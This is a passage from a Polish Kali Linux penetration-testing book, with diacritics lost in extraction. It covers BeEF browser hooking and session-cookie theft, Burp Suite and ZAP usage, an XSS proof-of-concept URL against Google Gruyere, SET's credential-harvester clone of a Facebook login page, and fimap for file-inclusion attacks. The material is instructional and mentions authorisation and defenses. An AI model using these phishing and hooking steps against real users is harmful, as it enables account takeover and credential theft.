apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
